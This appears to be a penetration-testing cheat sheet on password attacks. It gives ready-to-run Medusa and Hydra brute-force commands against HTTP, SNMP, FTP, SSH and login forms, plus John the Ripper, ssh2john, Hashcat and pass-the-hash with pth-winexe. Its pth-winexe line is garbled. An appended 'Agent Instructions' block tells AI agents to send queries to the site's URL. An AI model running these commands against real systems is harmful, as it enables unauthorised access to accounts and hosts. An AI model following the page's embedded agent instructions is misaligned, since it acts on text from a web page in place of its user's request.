# Password attacks #### `usr/share/wordlists` ### Medusa Brute force basic http authorizations. ``` medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10 ``` ### Hydra Can be used to brute force numerous services. ``` hydra -P password.txt -v 10.11.1.210 snmp hydra -l admin -P password.txt -v 122.168.31.219 ftp hydra -l root -P password.txt 10.11.1.219 ssh hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin ``` #### \*\* Brute force http-post login forms ``` Format: hydra -L -P http-post-form “::" Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" ``` ### John the Ripper ``` john --wordlist=/usr/share/wordlists/rockyou.txt ``` #### SSH keys To crack SSH key passwords convert the key to a hash, then crack using John. ``` python ssh2john.py id_rsa > id_rsa.hash ``` ### Hashcat **Check for mode on wiki page** ``` hashcat -m (mode) -a 0 hash.txt Pass.txt ``` ### Passing the hash (Windows) Create environment variable SMBHASH, containing hash we want to pass `export SMBHASH=hashvalue` `Use pth-winexe to authenticate: pth-winexe -U administrator% //10.11.0.1.76.cmd` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.oncyberwar.com/4.-exploitation/password-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.